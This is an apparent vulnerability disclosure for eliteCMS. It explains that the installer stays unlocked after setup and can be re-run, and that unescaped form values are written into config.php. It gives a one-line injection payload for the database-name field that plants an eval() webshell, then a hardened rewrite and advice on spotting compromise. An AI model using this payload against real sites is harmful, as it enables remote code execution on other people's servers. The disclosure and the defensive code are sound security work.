eliteCMS: installer not locked after installation + one-line backdoor written via the installer

Posted on 2012-11-18 13:59:27
The eliteCMS installer is not locked once installation has finished, so an attacker can open the installer URL again and re-run the installation.

The second vulnerability is that the installer writes unvalidated input straight into admin/includes/config.php, which lets a one-line PHP backdoor (a "one-liner" webshell) be written into that file.
Let's look at the code:

...
elseif ($_GET['step'] == "4") {
    $file = "../admin/includes/config.php";
    $write = "<?php\n";
    $write .= "/**\n";
    $write .= "*\n";
    $write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";
...omitted...
    $write .= "*\n";
    $write .= "*/\n";
    $write .= "\n";
    // session values come straight from the install form and are interpolated
    // into PHP source without escaping
    $write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";
    $write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";
    $write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";
    $write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";
    $write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";
    $write .= "if (!\$connection) {\n";
    $write .= "        die(\"Database connection failed\" .mysql_error());\n";
    $write .= "        \n";
    $write .= "} \n";
    $write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";
    $write .= "if (!\$db_select) {\n";
    $write .= "        die(\"Database select failed\" .mysql_error());\n";
    $write .= "        \n";
    $write .= "} \n";
    $write .= "?>\n";

    $writer = fopen($file, 'w');
...

Now look at where those session values come from:

$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];
$_SESSION['DB_NAME'] = $_POST['DB_NAME'];
$_SESSION['DB_USER'] = $_POST['DB_USER'];
$_SESSION['DB_PASS'] = $_POST['DB_PASS'];

The values are taken from the POST request without any validation.
If the database name is POSTed as:

"?><?php eval($_POST[c]);?><?php

the resulting one-line backdoor is written into /admin/includes/config.php.
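For comparison, here is a hardened version of the same step-4 config writer. This is an added example, not eliteCMS's own code: the lock-file name (install.lock), the function names validateSetting()/buildConfig() and the validation rules are assumptions. It closes both issues described above: it refuses to run once a lock file exists, and it emits each setting with var_export(), which produces a properly quoted PHP string literal, so a submitted value can no longer terminate the string or the PHP block.

```php
<?php
// Added example (not eliteCMS code): hardened installer step 4.

// 1. Refuse to run again once installation has completed. The installer
//    creates install.lock (assumed name) at the end of a successful run.
$lockFile = __DIR__ . '/install.lock';
if (file_exists($lockFile)) {
    http_response_code(403);
    exit('Installation already completed; delete the installer directory.');
}

/**
 * Validate one DB setting from the install form.
 * Control characters are rejected everywhere; host, database and user
 * names are further restricted to a conservative character set.
 * The password may contain any printable characters because var_export()
 * below escapes it safely.
 */
function validateSetting(string $name, string $value): string
{
    if ($value === '' || strlen($value) > 128
        || preg_match('/[\x00-\x1f\x7f]/', $value)) {
        throw new InvalidArgumentException("invalid value for $name");
    }
    if ($name !== 'DB_PASS' && !preg_match('/^[A-Za-z0-9_.\-]+$/', $value)) {
        throw new InvalidArgumentException("invalid characters in $name");
    }
    return $value;
}

/**
 * Build the contents of config.php. var_export() emits a single-quoted,
 * escaped PHP literal, so the payload from the post above would become
 * define('DB_NAME', '"?><?php eval($_POST[c]);?><?php'); -- an inert string
 * (and validateSetting() rejects it for DB_NAME anyway).
 */
function buildConfig(array $settings): string
{
    $out = "<?php\n";
    foreach (['DB_SERVER', 'DB_NAME', 'DB_USER', 'DB_PASS'] as $key) {
        $out .= 'define(' . var_export($key, true) . ', '
              . var_export($settings[$key], true) . ");\n";
    }
    // No closing "?>" tag: nothing can follow it, and it avoids stray output.
    return $out;
}

$settings = [];
foreach (['DB_SERVER', 'DB_NAME', 'DB_USER', 'DB_PASS'] as $key) {
    $settings[$key] = validateSetting($key, (string)($_POST[$key] ?? ''));
}

// 2. Write atomically with restrictive permissions, then create the lock.
$file = __DIR__ . '/../admin/includes/config.php';
$tmp  = $file . '.tmp';
if (file_put_contents($tmp, buildConfig($settings), LOCK_EX) === false
    || !chmod($tmp, 0640) || !rename($tmp, $file)) {
    exit('could not write config.php');
}
file_put_contents($lockFile, date('c'));
```

On an existing deployment the practical checks are the same two points: make sure the installer directory is removed or blocked after setup, and treat any PHP tag or eval() call inside admin/includes/config.php as an indicator of compromise, since that file should only ever contain define() lines.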